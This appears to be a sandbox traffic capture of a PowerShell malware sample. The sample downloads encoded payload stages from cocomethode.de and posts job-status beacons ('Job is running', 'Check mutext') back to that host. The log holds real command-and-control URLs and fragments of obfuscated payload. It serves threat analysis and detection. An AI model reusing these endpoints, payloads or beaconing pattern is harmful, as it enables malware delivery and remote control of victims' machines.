2024-12-11 11:58:33 UTC	1369	IN	Data Raw: 6a 65 4f 4c 54 30 59 55 6c 79 4e 53 46 79 6e 55 56 30 57 4f 44 34 44 56 59 69 4f 63 54 54 7b 55 6a 53 4f 4c 6a 38 49 52 55 47 4e 4c 6d 71 70 55 6a 65 4b 4f 47 6d 75 57 6c 71 4e 53 47 57 32 56 6c 71 60 63 44 34 59 55 6c 30 60 60 6c 72 79 55 30 53 60 60 57 6d 54 52 59 6d 60 57 47 5b 6e 55 54 53 4b 4c 31 31 78 56 55 43 60 53 47 6a 79 55 56 71 57 64 54 30 70 57 6c 75 4e 57 46 69 70 55 6a 53 4f 4c 30 71 59 55 55 4f 4e 64 6a 44 31 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 48 76 58 33 34 73 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 6a 65 4a 65 6d 71 48 60 33 65 50 54 31 47 73 58 6a 62 34 63 6d 53 59 57 6f 71 6b 4c 6a 5b 74 56 6d 69 4f 5b 33 5b 45 50 6a 53 68 4c 6b 54 78 Data Ascii: jeOLT0YUlyNSFynUV0WOD4DVYiOcTT{UjSOLj8IRUGNLmqpUjeKOGmuWlqNSGW2Vlq`cD4YUl0``lryU0S``WmTRYm`WG[nUTSKL11xVUC`SGjyUVqWdT0pWluNWFipUjSOL0qYUUONdjD1RVq{UjOqPVeKP1HvX34sUjOqPVeKP1GoRTOC[3W2LDuKP1GoRTOC[1mEPVeKP1GoRjeJemqH`3ePT1GsXjb4cmSYWoqkLj[tVmiO[3[EPjShLkTx
2024-12-11 11:58:33 UTC	286	IN	Data Raw: 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 33 4f 37 63 32 5b 4c 4c 6a 34 33 56 55 48 34 65 47 71 58 54 6c 38 68 4c 6d 4b 72 55 46 30 52 63 44 76 78 56 6f 43 68 53 30 57 34 55 49 71 57 64 6d 6d 70 5b 32 69 4e 4c 6a 31 78 56 56 71 53 65 31 31 78 56 6c 75 60 23 28 28 3a 0b 48 6f 77 6e 6a 64 2c 44 79 71 73 64 72 72 68 6e 6f 21 29 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 Data Ascii: dyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe3O7c2[LLj43VUH4eGqXTl8hLmKrUF0RcDvxVoChS0W4UIqWdmmp[2iNLj1xVVqSe11xVlu`#((:Hownjd,Dyqsdrrhno!)ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rush

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:34 UTC	365	OUT	GET /file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:58:35 UTC	1338	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:35 GMT Content-Type: application/octet-stream Content-Length: 21738 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNlqopOw3FOo%2BbBwe%2FVaq%2B58CTDMFVRQ0utZBCruUerxccuKyyG7Fof7a4x3zv44uyW5OFrK%2BWANJpTZpZb%2FHZ2gWqSb%2FVt3prRxstaunFeXB12lwYVm%2BGPAHsGLyeChI1mloZugpROa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=44014&min_rtt=1313&rtt_var=19877&sent=13973&recv=6022&lost=0&retrans=8&sent_bytes=19946447&recv_bytes=115932&delivery_rate=47611739&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054dbc9e47bfb3-ATL server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=51&rtt_var=11&sent=9&recv=11&lost=0&retrans=0&sent_bytes=12417&recv_bytes=2278&delivery_rate=1235528301&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113811&min_rtt=113795&rtt_var=24029&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1003&delivery_rate=33649&cwnd=252&unsent_bytes=0&cid=c3be2c5d48e0952d&ts=590&x=0"
2024-12-11 11:58:35 UTC	31	IN	Data Raw: 25 78 67 6d 63 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b Data Ascii: %xgmcb<ZRxrudl/Udyu/Dobnehof\;;
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 33 69 6e 5b 46 30 72 65 6c 4f 73 53 6c 75 68 57 33 79 30 55 32 62 76 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 6d 43 56 53 6a 71 69 54 6d 5b 56 57 30 47 72 56 6d 5b 4b 50 30 4b 76 58 7b 47 56 50 6d 44 76 4e 59 65 60 57 7b 50 32 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 4b 76 56 6c 6d 6f 60 33 47 58 55 6d 5b 53 57 54 34 50 58 31 65 56 65 54 6d 45 4c 56 79 6b 54 31 47 32 52 30 44 76 52 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 45 47 52 54 30 65 73 57 6d 5b 56 60 31 71 59 57 6d 4f 43 60 56 44 78 4e 46 65 5b 4c 6a 5b 30 52 54 65 4a 4f 56 4f Data Ascii: @RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#W3in[F0relOsSluhW3y0U2bvR1mEPVeKRECNP3mC[1mEPmCVSjqiTm[VW0GrVm[KP0KvX{GVPmDvNYe`W{P2SGGwUjOqPVeKP1KvVlmo`3GXUm[SWT4PX1eVeTmELVykT1G2R0DvR1mEPVeKRIONP3mC[1mEPVeKP1GoWEGRT0esWm[V`1qYWmOC`VDxNFe[Lj[0RTeJOVO
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 6a 57 46 50 6d 65 59 5b 44 4b 4f 57 54 5b 47 54 57 57 46 58 57 57 57 53 6b 53 53 57 57 4b 4e 54 57 54 79 50 6d 47 75 65 44 4b 52 53 33 53 42 57 33 75 46 50 33 47 57 53 6a 69 56 57 54 5b 69 54 57 57 4a 62 30 47 57 54 6d 4b 53 57 55 57 52 54 57 53 52 50 6d 4b 49 5b 44 4b 59 57 6a 5b 42 5b 45 43 46 53 57 65 57 53 6c 47 57 57 54 58 7b 54 57 57 6a 52 6d 47 56 63 46 34 53 56 46 53 42 54 6a 5b 56 50 6d 53 75 5b 44 4b 4e 53 54 5b 48 54 30 57 46 56 6c 50 76 53 55 47 53 57 56 53 52 54 57 5b 72 4c 30 47 54 53 6a 4b 52 4c 47 5b 42 57 45 47 46 50 6a 30 57 53 6a 57 69 4c 44 5b 4e 54 57 57 47 64 47 47 57 54 6c 34 53 57 6f 43 42 54 57 69 6e 50 6d 48 76 63 44 4b 54 4c 54 5b 42 55 6a 57 46 53 57 6a 76 53 6a 34 6a 4c 44 58 30 54 57 57 6a 52 6d 47 56 63 46 34 53 57 47 4b 42 Data Ascii: jWFPmeY[DKOWT[GTWWFXWWWSkSSWWKNTWTyPmGueDKRS3SBW3uFP3GWSjiVWT[iTWWJb0GWTmKSWUWRTWSRPmKI[DKYWj[B[ECFSWeWSlGWWTX{TWWjRmGVcF4SVFSBTj[VPmSu[DKNST[HT0WFVlPvSUGSWVSRTW[rL0GTSjKRLG[BWEGFPj0WSjWiLD[NTWWGdGGWTl4SWoCBTWinPmHvcDKTLT[BUjWFSWjvSj4jLDX0TWWjRmGVcF4SWGKB
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 4b 53 4c 6c 53 42 56 6b 43 46 53 47 47 57 53 6a 71 53 57 54 5b 74 54 57 57 4e 54 6d 47 59 52 6a 4b 53 63 6d 71 42 54 6b 4b 4e 50 6d 5b 46 53 6a 4f 68 53 54 5b 4b 57 47 57 46 60 6c 50 76 52 6c 38 53 57 56 53 70 54 57 5b 76 54 6d 47 74 62 44 4b 53 4c 44 5b 42 54 7b 4f 6a 50 6a 38 57 53 6a 53 53 57 54 5b 4d 54 57 57 4a 4f 6d 47 57 60 47 4b 53 57 31 34 74 54 56 34 42 50 6d 4b 37 54 6a 4b 59 63 6c 53 45 54 55 43 46 52 44 38 47 53 6c 47 53 57 54 6a 79 54 57 57 52 64 6d 47 57 54 6d 4b 53 57 59 53 42 54 55 43 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 44 54 57 57 46 52 30 47 57 52 6f 71 53 57 56 4c 31 54 57 5b 76 4c 30 47 73 4f 54 4b 52 4c 57 5b 42 56 55 4f 6a 50 33 57 73 53 6a 69 52 57 54 5b 69 5b 45 43 4a 62 30 47 57 60 44 34 53 57 56 79 42 54 57 69 4a 50 6d 4b 44 50 Data Ascii: KSLlSBVkCFSGGWSjqSWT[tTWWNTmGYRjKScmqBTkKNPm[FSjOhST[KWGWF`lPvRl8SWVSpTW[vTmGtbDKSLD[BT{OjPj8WSjSSWT[MTWWJOmGW`GKSW14tTV4BPmK7TjKYclSETUCFRD8GSlGSWTjyTWWRdmGWTmKSWYSBTUCFPmOWSjK`LD[DTWWFR0GWRoqSWVL1TW[vL0GsOTKRLW[BVUOjP3WsSjiRWT[i[ECJb0GW`D4SWVyBTWiJPmKDP
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 46 50 6d 6e 76 53 6a 53 53 57 54 5b 4a 54 57 57 46 63 6d 47 57 57 6f 4b 53 57 31 71 74 54 56 71 4a 50 6d 4b 37 60 44 4b 5b 56 46 53 45 58 6a 57 46 53 44 30 47 53 6d 65 6a 4c 44 71 7b 54 57 57 6a 52 6d 47 56 57 6c 34 53 63 59 69 42 54 31 57 56 50 6d 71 46 53 6a 4f 68 53 54 5b 4b 57 47 57 46 60 30 47 57 53 6c 34 53 57 54 30 32 54 57 5b 60 54 6d 47 74 63 44 4b 52 4c 6f 53 42 54 30 57 46 50 6c 44 76 53 6a 6d 56 57 54 5b 70 56 6b 43 4a 65 30 47 57 55 6a 4b 53 57 59 69 52 54 56 72 30 50 6d 48 79 57 6a 4b 60 53 54 5b 45 58 6b 43 46 52 44 38 47 53 6c 47 53 57 54 5b 74 54 57 57 60 50 6d 47 59 52 6b 4f 53 63 6f 43 42 54 31 5b 46 50 6d 4f 57 53 6a 4b 6a 53 54 5b 46 56 6b 43 46 58 57 57 57 52 6c 38 53 57 56 53 52 54 57 5b 76 54 6d 47 74 63 44 4b 55 53 55 47 42 54 30 Data Ascii: FPmnvSjSSWT[JTWWFcmGWWoKSW1qtTVqJPmK7`DK[VFSEXjWFSD0GSmejLDq{TWWjRmGVWl4ScYiBT1WVPmqFSjOhST[KWGWF`0GWSl4SWT02TW[`TmGtcDKRLoSBT0WFPlDvSjmVWT[pVkCJe0GWUjKSWYiRTVr0PmHyWjK`ST[EXkCFRD8GSlGSWT[tTWW`PmGYRkOScoCBT1[FPmOWSjKjST[FVkCFXWWWRl8SWVSRTW[vTmGtcDKUSUGBT0
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 4c 44 5b 47 55 54 57 46 52 6d 47 57 53 6f 4b 53 57 56 53 4e 54 57 65 4a 4c 30 47 74 57 6a 4b 55 53 6a 5b 42 57 33 79 46 50 33 53 57 53 6a 6d 57 57 54 5b 4f 56 6b 43 4a 62 57 47 57 58 7b 53 53 57 31 71 74 54 56 71 42 50 6d 48 79 57 6a 4b 5b 63 56 53 45 55 54 57 46 53 56 4c 76 53 6a 57 57 57 54 5b 4c 54 57 57 4e 50 6d 47 57 63 44 4b 53 57 33 53 42 54 55 43 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 44 54 57 57 46 52 6d 47 57 52 6f 53 53 57 56 4c 31 54 57 65 4e 63 6d 47 59 5b 44 4b 53 4c 6c 53 42 54 33 75 46 50 33 4f 47 53 6a 53 53 57 54 5b 53 57 57 57 46 63 6d 47 57 54 6a 4b 53 57 55 6a 7b 54 57 65 6a 50 6d 44 79 53 6a 4b 5b 57 6a 5b 42 56 6b 43 46 53 44 30 47 53 6c 6d 53 57 54 6d 32 54 57 57 4e 50 6d 47 57 62 44 4b 53 63 56 79 42 54 31 65 31 50 6d 71 47 53 6a 4f Data Ascii: LD[GUTWFRmGWSoKSWVSNTWeJL0GtWjKUSj[BW3yFP3SWSjmWWT[OVkCJbWGWX{SSW1qtTVqBPmHyWjK[cVSEUTWFSVLvSjWWWT[LTWWNPmGWcDKSW3SBTUCFPmOWSjK`LD[DTWWFRmGWRoSSWVL1TWeNcmGY[DKSLlSBT3uFP3OGSjSSWT[SWWWFcmGWTjKSWUj{TWejPmDySjK[Wj[BVkCFSD0GSlmSWTm2TWWNPmGWbDKScVyBT1e1PmqGSjO
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 6c 48 76 53 6a 53 57 57 54 6a 30 54 57 57 47 65 30 47 57 55 6c 34 53 60 6c 79 42 54 57 53 42 50 6d 44 78 5b 44 4b 54 60 31 5b 42 58 6b 43 46 53 57 57 57 53 6a 79 53 57 54 54 34 54 47 4f 4b 62 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 66 76 55 6a 4f 71 50 56 65 4b 50 31 4b 72 58 6a 69 4e 63 44 53 53 63 33 65 4b 50 31 47 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 54 47 5b 46 52 6c 47 52 57 6d 5b 59 54 56 79 60 57 6a 6d 45 52 6c 6d 6d 56 44 4b 6e 58 7b 4f 4f 5b 33 53 59 53 6c 71 4b 52 44 6e 79 58 6c 6d 42 60 6c 4b 59 54 56 6d 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 54 5b 44 65 46 64 56 53 45 4c 59 65 6b 63 55 6d 70 56 6d 69 4e 64 6a 6d 45 52 6f 65 68 4c 33 53 72 58 33 34 4e 63 30 71 59 64 49 4f 4c 63 57 58 31 56 6d 4f 4b Data Ascii: lHvSjSWWTj0TWWGe0GWUl4S`lyBTWSBPmDx[DKT`1[BXkCFSWWWSjySWTT4TGOKbD82LDuKP1GoRTfvUjOqPVeKP1KrXjiNcDSSc3eKP1Go[YbvR1mEPVeKP1GoRTOBTG[FRlGRWm[YTVy`WjmERlmmVDKnX{OO[3SYSlqKRDnyXlmB`lKYTVmQe{CMRTOC[1mEPVeKP1KT[DeFdVSELYekcUmpVmiNdjmERoehL3SrX34Nc0qYdIOLcWX1VmOK
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 48 76 58 33 34 56 63 44 75 58 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 54 34 57 57 57 72 62 44 5b 56 57 6d 71 45 57 6c 79 57 5b 31 6d 75 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 31 6d 49 56 6f 43 68 53 30 57 71 55 32 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4a 53 30 4b 33 5b 45 48 30 62 33 48 78 53 6c 75 57 63 57 5b 37 5b 47 65 35 4c 44 6d 44 4c 46 65 52 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 59 53 52 63 56 79 7b 56 6d 57 60 64 56 48 78 4c 57 5b 6b 63 59 65 6f 55 47 5b 56 64 56 4b 45 50 56 6d 69 52 47 48 76 58 31 69 4f 4f 6a 79 34 4e 56 71 68 4c 6a 34 33 58 6d 65 56 4c 46 47 49 4e 56 75 60 54 7b 57 73 56 6d 4c 34 63 56 47 59 64 46 79 4f 60 55 6d 71 55 54 65 4e 60 30 71 49 53 55 53 51 57 Data Ascii: HvX34VcDuXb14E`TGoRTOC[1mEPVeKP1GoRTT4WWWrbD[VWmqEWlyW[1muTo[jLkW{XkKF`1mIVoChS0WqU2bvR1mEPVeKP1GoRTOC[1mEPVeJS0K3[EH0b3HxSluWcW[7[Ge5LDmDLFeRS{j{Xl05emmYTYSRcVy{VmW`dVHxLW[kcYeoUG[VdVKEPVmiRGHvX1iOOjy4NVqhLj43XmeVLFGINVu`T{WsVmL4cVGYdFyO`UmqUTeN`0qISUSQW
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 45 50 59 53 57 4c 6d 5b 70 58 6b 48 30 60 33 4f 34 50 55 47 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 55 6d 57 57 56 79 76 53 6d 5b 56 56 6a 4f 56 63 47 57 6f 52 56 34 4e 4c 47 6d 58 52 6b 43 4b 52 44 4b 34 58 6b 4b 4e 63 46 4c 7b 55 59 4f 4b 52 46 53 6e 58 57 69 53 5b 33 4c 7b 54 6f 5b 6b 50 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 55 4f 52 60 46 4f 74 54 59 53 57 52 44 71 33 56 55 4b 56 64 6c 4f 34 50 56 75 5b 4c 6b 47 73 57 46 30 46 65 47 71 55 50 59 53 53 56 44 71 74 5b 47 62 79 63 46 4b 74 54 6a 30 69 56 44 35 76 52 54 4f 6f 60 30 6a 78 4e 59 53 68 57 31 5b 30 56 6a 4f 73 5b 31 79 56 5b 49 43 68 63 57 4b 33 5b 45 47 4e 4c 46 Data Ascii: EPYSWLm[pXkH0`3O4PUGQe{CMRTOC[1mEPVeKP1GoRTOC[1mEPVeKSUmWWVyvSm[VVjOVcGWoRV4NLGmXRkCKRDK4XkKNcFL{UYOKRFSnXWiS[3L{To[kP1j2SGGw[1mEPVeKP1GoRTOC[1mEPVeKP1GoWUOR`FOtTYSWRDq3VUKVdlO4PVu[LkGsWF0FeGqUPYSSVDqt[GbycFKtTj0iVD5vRTOo`0jxNYShW1[0VjOs[1yV[IChcWK3[EGNLF
2024-12-11 11:58:35 UTC	1369	IN	Data Raw: 6e 57 30 53 57 64 47 71 59 53 57 71 4a 52 54 50 76 5b 30 47 45 5b 32 43 51 65 7b 43 4d 53 47 47 76 63 56 53 59 4f 56 71 6a 53 33 79 33 58 6c 6d 42 58 57 47 56 60 47 47 52 60 32 43 57 54 31 57 6e 55 31 53 53 62 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 30 43 55 50 6a 47 6d 4c 7b 40 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 32 53 72 5b 57 4f 43 4e 54 6d 45 52 6a 53 68 4c 6b 54 76 56 6d 62 30 4c 44 79 56 54 6b 57 6b 53 30 57 71 55 32 62 76 52 31 6d 45 50 56 65 4b 50 30 48 78 56 57 65 35 4c 57 71 55 50 55 6d 4b 50 31 71 6e 58 31 69 42 62 33 47 59 55 6c 69 6a 53 33 79 33 58 6c 6a 34 62 56 4c 78 4e 59 57 4b 60 6f 4f 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 50 30 4b 77 56 6d 65 46 60 30 71 58 52 6f 71 59 64 57 4b 78 56 6d Data Ascii: nW0SWdGqYSWqJRTPv[0GE[2CQe{CMSGGvcVSYOVqjS3y3XlmBXWGV`GGR`2CWT1WnU1SSbEeDTV8oRTOC[1qI`Fy[W0KrX34O[0CUPjGmL{@2SGGw[1mEPVeJS2Sr[WOCNTmERjShLkTvVmb0LDyVTkWkS0WqU2bvR1mEPVeKP0HxVWe5LWqUPUmKP1qnX1iBb3GYUlijS3y3Xlj4bVLxNYWK`oONP3bvR1mEPVeKP0KwVmeF`0qXRoqYdWKxVm

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:36 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 85
2024-12-11 11:58:36 UTC	85	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
2024-12-11 11:58:37 UTC	1183	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:37 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PbytYAlfKKIad%2BeSYzKrCBOeN0r3X9e3DADQuXllf%2FMSA%2BFNYYEU9febfoaiOrmLWyKLFKA8GnPlFBVQHuNVZeiwFDrO6io7jCg2tOfIyAX65ACSc6PPLh%2FrkWCxmgqaxL8hPzESzoPZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13761&min_rtt=1243&rtt_var=22392&sent=6&recv=8&lost=0&retrans=0&sent_bytes=1533&recv_bytes=2586&delivery_rate=29698&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054dc6f81f507f-ATL server-timing: cfL4;desc="?proto=TCP&rtt=32&min_rtt=32&rtt_var=16&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=624&delivery_rate=0&cwnd=85&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113983&min_rtt=113964&rtt_var=24074&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1029&delivery_rate=33584&cwnd=252&unsent_bytes=0&cid=ee4ead514c44ee31&ts=857&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:38 UTC	389	OUT	GET /file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:58:38 UTC	1302	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:38 GMT Content-Type: application/octet-stream Content-Length: 2684 Connection: close content-disposition: attachment; filename=file; filename*=UTF-8''file CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2gMhgso3sOkNNav238YvGnfkWPorrc8iJmsKtYW7JQN8sJVCNSvQFO6lGNFpsiha5NnJCejWRt1f9S1gLT%2B%2Fi5q498UbPie%2BmLN4LzWDW7Bc3jMcjlomBKI6kErfAshCc30iHduS88n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24299&min_rtt=1061&rtt_var=30324&sent=10&recv=12&lost=0&retrans=0&sent_bytes=3077&recv_bytes=4423&delivery_rate=26522&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054dd12dc7bfe3-ATL server-timing: cfL4;desc="?proto=TCP&rtt=55&min_rtt=53&rtt_var=19&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4958&recv_bytes=1872&delivery_rate=1056177419&cwnd=94&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=47&rtt_var=8&sent=12&recv=14&lost=0&retrans=0&sent_bytes=35280&recv_bytes=2898&delivery_rate=1393255319&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:58:38 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 36 37 38 26 6d 69 6e 5f 72 74 74 3d 31 31 33 36 35 35 26 72 74 74 5f 76 61 72 3d 32 34 30 31 32 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 30 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 37 39 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 65 63 66 34 39 66 66 66 64 33 34 32 32 62 31 33 26 74 73 3d 36 30 32 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113678&min_rtt=113655&rtt_var=24012&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1003&delivery_rate=33679&cwnd=252&unsent_bytes=0&cid=ecf49fffd3422b13&ts=602&x=0"
2024-12-11 11:58:38 UTC	1216	IN	Data Raw: 50 4b 03 04 14 00 08 00 08 00 9a 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 8f 3b 0e c2 30 10 44 af 62 6d 4f 36 50 20 84 e2 a4 41 48 69 a3 70 00 cb de 38 51 e2 8f 6c f3 bb 3d 2e 28 08 a2 a0 1c ed cc db 99 aa 79 98 85 dd 28 c4 c9 59 0e db a2 04 46 56 3a 35 59 cd e1 d2 9f 37 07 68 ea aa a3 45 a4 ec 88 e3 e4 23 cb 11 1b 39 8c 29 f9 23 62 94 23 19 11 0b e7 c9 e6 cb e0 82 11 29 cb a0 d1 0b 39 0b 4d b8 2b cb 3d 86 4f 06 ac 99 ac 17 41 53 e2 70 77 41 a1 72 f2 6a c8 a6 22 e3 80 b5 8a 83 9f 75 d7 aa dc ad 7f 7a fa e7 b3 1b 86 49 d2 e9 0d fa 51 e0 cb 01 0c eb 0a 57 33 eb 17 50 4b 07 08 4f 8b dd 3c a6 00 00 00 1c 01 00 00 50 4b 03 04 14 00 08 00 08 00 9a 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 77 6f Data Ascii: PK~\|Y_rels/.rels;0DbmO6P AHip8Ql=.(y(YFV:5Y7hE#9)#b#)9M+=OASpwArj"uzIQW3PKO<PK~\|Ywo
